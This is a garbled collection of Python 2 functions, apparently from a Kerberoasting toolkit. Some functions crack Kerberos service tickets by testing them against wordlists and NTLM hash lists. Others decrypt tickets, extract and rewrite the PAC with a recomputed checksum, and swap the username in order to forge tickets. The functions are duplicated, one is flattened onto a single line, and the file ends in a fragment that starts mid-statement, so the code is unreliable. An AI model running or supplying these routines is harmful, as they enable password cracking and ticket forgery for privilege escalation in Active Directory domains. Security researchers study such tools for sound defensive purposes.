def getpac(key, rawticket, debug=False, verbose=False):
# attempt decoding of ticket
try:
ramticket, extra = decoder.decode(rawticket)
serverticket = ramticket.getComponentByPosition(2)
localticket = ramticket.getComponentByPosition(3)
encserverticket = serverticket.getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2).asOctets()
except:
raise ValueError('Unable to decode ticket. Invalid file.')
if verbose: print 'Ticket succesfully decoded'
decserverticketraw, nonce = kerberos.decrypt(key, 2, encserverticket)
if decserverticketraw == None:
raise ValueError('Unable to decrypt ticket. Invalid key.')
elif verbose:
print 'Decryption successful'
decserverticket, extra = decoder.decode(decserverticketraw)
# have two here because I was using one to verify that the rewrite matched
# This stuff should be removed, if it is still here Tim forgot...again
origdecserverticket, extra = decoder.decode(decserverticketraw)
# change the validity times in the server ticket
updatetimestampsserverticket(decserverticket, str(decserverticket[5]), str(decserverticket[6]), str(decserverticket[7]), str(decserverticket[8]))
adifrelevant, extra = decoder.decode(decserverticket[9][0][1])
pac = str(adifrelevant.getComponentByPosition(0).getComponentByPosition(1))
return pac
def crackTicket(ticket, label, hashList):
try:
data = base64.b64decode(ticket)
except:
#print "DEBUG\n" + str(ticket) + "DEBUG\n\n"
return "FAIL" + str(label) + "\n"
manager = Manager()
enctickets = manager.list()
if data[0] == '\x76':
try:
enctickets.append((str(decoder.decode(data)[0][2][0][3][2])))
except:
#print "DEBUG\n" + str(ticket) + "DEBUG\n\n"
return "FAIL" + str(label)
elif data[:2] == '6d':
for ticket in data.strip().split('\n'):
try:
enctickets.append((str(decoder.decode(ticket.decode('hex'))[0][4][3][2])))
except:
#print "DEBUG\n" + str(ticket) + "DEBUG\n\n"
return "FAIL" + str(label)
print "\nAccount: " + label
for currentHash in hashList:
ntlmHash_hex = binascii.unhexlify(currentHash)
kdata, nonce = kerberos.decrypt(ntlmHash_hex, 2, enctickets[0])
if kdata:
print "NTLM Hash: " + currentHash
break
return ""
def crackTicket(ticket, label, hashList):
try:
data = base64.b64decode(ticket)
except:
#print "DEBUG\n" + str(ticket) + "DEBUG\n\n"
return "FAIL" + str(label) + "\n"
manager = Manager()
enctickets = manager.list()
if data[0] == '\x76':
try:
enctickets.append((str(decoder.decode(data)[0][2][0][3][2])))
except:
#print "DEBUG\n" + str(ticket) + "DEBUG\n\n"
return "FAIL" + str(label)
elif data[:2] == '6d':
for ticket in data.strip().split('\n'):
try:
enctickets.append(
(str(decoder.decode(ticket.decode('hex'))[0][4][3][2])))
except:
#print "DEBUG\n" + str(ticket) + "DEBUG\n\n"
return "FAIL" + str(label)
print "\nAccount: " + label
for currentHash in hashList:
ntlmHash_hex = binascii.unhexlify(currentHash)
kdata, nonce = kerberos.decrypt(ntlmHash_hex, 2, enctickets[0])
if kdata:
print "NTLM Hash: " + currentHash
break
return ""
def crack(wordlist, enctickets):
toremove = []
while enctickets:
try:
word = wordlist.get()
if word == 'ENDOFQUEUEENDOFQUEUEENDOFQUEUE':
break
print "\ntrying %s" % word.encode('utf-8').decode(
'utf-8-sig').strip()
for et in enctickets:
kdata, nonce = kerberos.decrypt(kerberos.ntlmhash(word), 2,
et[0])
if kdata:
print 'found password for ticket %i: %s File: %s' % (
et[1], word, et[2])
toremove.append(et)
# if len(et):
# print str(et[0])
for et in toremove:
try:
enctickets.remove(et)
except:
return
if not enctickets:
return
except:
continue
def updatepac(key, rawticket, pac, debug=False, verbose=False):
# attempt decoding of ticket
try:
ramticket, extra = decoder.decode(rawticket)
serverticket = ramticket.getComponentByPosition(2)
localticket = ramticket.getComponentByPosition(3)
encserverticket = serverticket.getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2).asOctets()
except:
raise ValueError('Unable to decode ticket. Invalid file.')
if verbose: print 'Ticket succesfully decoded'
decserverticketraw, nonce = kerberos.decrypt(key, 2, encserverticket)
if decserverticketraw == None:
raise ValueError('Unable to decrypt ticket. Invalid key.')
elif verbose:
print 'Decryption successful'
decserverticket, extra = decoder.decode(decserverticketraw)
#for i in range(len(decserverticket[3])):
# print '---%i---' % i
# print decserverticket[3][i]
# have two here because I was using one to verify that the rewrite matched
# This stuff should be removed, if it is still here Tim forgot...again
origdecserverticket, extra = decoder.decode(decserverticketraw)
# change the validity times in the server ticket
updatetimestampsserverticket(decserverticket, str(decserverticket[5]), str(decserverticket[6]), str(decserverticket[7]), str(decserverticket[8]))
adifrelevant, extra = decoder.decode(decserverticket[9][0][1])
chksum = kerberos.chksum(key, '\x11\x00\x00\x00', pac)
#print 'newchecksum: %s' % chksum.encode('hex')
# repair server checksum
newpac = pac[:-44] + chksum + pac[-28:]
# rebuild AD-IF-RELEVANT
#print adifrelevant
#print dir(adifrelevant.getComponentByPosition(0).getComponentByPosition(1))
adifrelevant.getComponentByPosition(0).getComponentByPosition(1)._value = newpac
#print adifrelevant
decserverticket.getComponentByPosition(9).getComponentByPosition(0).getComponentByPosition(1)._value = encoder.encode(adifrelevant)
# put the ticket back together again
newencserverticket = kerberos.encrypt(key, 2, encoder.encode(decserverticket), nonce)
ramticket.getComponentByPosition(2).getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2)._value = newencserverticket
#print decserverticket
return encoder.encode(ramticket)
def crack(wordlist, enctickets):
toremove = []
while enctickets:
word = wordlist.get()
#print "trying %s" % word
for et in enctickets:
kdata, nonce = kerberos.decrypt(kerberos.ntlmhash(word), 2, et[0])
if kdata:
print('found password for ticket %i: %s File: %s' %
(et[1], word, et[2]))
toremove.append(et)
for et in toremove:
try:
enctickets.remove(et)
except:
return
if not enctickets:
return
def crack(wordlist, enctickets): toremove = [] while enctickets: word = wordlist.get() if word == 'ENDOFQUEUEENDOFQUEUEENDOFQUEUE': break #print "trying %s" % word for et in enctickets: kdata, nonce = kerberos.decrypt(kerberos.ntlmhash(word), 2, et[0]) if kdata: print 'found password for ticket %i: %s File: %s' % (et[1], word, et[2]) toremove.append(et) for et in toremove: try: enctickets.remove(et) except: return if not enctickets: return
def updateusernameinencpart(key, rawticket, username, debug=False, verbose=False):
try:
ramticket, extra = decoder.decode(rawticket)
serverticket = ramticket.getComponentByPosition(2)
localticket = ramticket.getComponentByPosition(3)
encserverticket = serverticket.getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2).asOctets()
except:
raise ValueError('Unable to decode ticket. Invalid file.')
if verbose: print 'Ticket succesfully decoded'
decserverticketraw, nonce = kerberos.decrypt(key, 2, encserverticket)
a = decoder.decode(decserverticketraw)[0]
a[3][1][0]._value = username
e = encoder.encode(a)
newencserverticket = kerberos.encrypt(key, 2, e, nonce)
ramticket.getComponentByPosition(2).getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2)._value = newencserverticket
return ramticket
((decoder.decode(data)[0][2][0][3][2]).asOctets(), i, f))
i += 1
elif data[:2] == '6d':
for ticket in data.strip().split('\n'):
enctickets.append(((decoder.decode(
ticket.decode('hex'))[0][4][3][2]).asOctets(), i, f))
i += 1
if len(enctickets):
print("Cracking %i tickets..." % len(enctickets))
else:
print("No tickets found")
sys.exit()
# load wordlist
for w in args.wordlistfile:
word = w.decode('utf-8').strip()
hash = kerberos.ntlmhash(word)
for et in enctickets:
kdata, nonce = kerberos.decrypt(hash, 2, et[0])
if kdata:
print('found password for ticket %i: %s File: %s' %
(et[1], word, et[2]))
enctickets.remove(et)
if len(enctickets) == 0:
print('Successfully cracked all tickets')
sys.exit()
if len(enctickets):
print("Unable to crack %i tickets" % len(enctickets))